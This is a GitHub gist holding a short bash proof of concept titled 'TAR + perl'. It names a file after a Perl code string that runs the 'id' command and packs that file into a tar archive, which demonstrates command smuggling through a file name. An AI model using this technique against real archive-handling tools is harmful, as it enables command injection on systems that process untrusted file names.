Created
February 28, 2018 22:13
-
-
Save cedriczirtacic/76d68e4b3c30450d7a2f95a81a090534 to your computer and use it in GitHub Desktop.
TAR + perl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
perl='print(qx{id});#' | |
touch $perl && echo "this is a normal file" > $perl | |
tar -vcf normal.tar $perl | |
file normal.tar |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment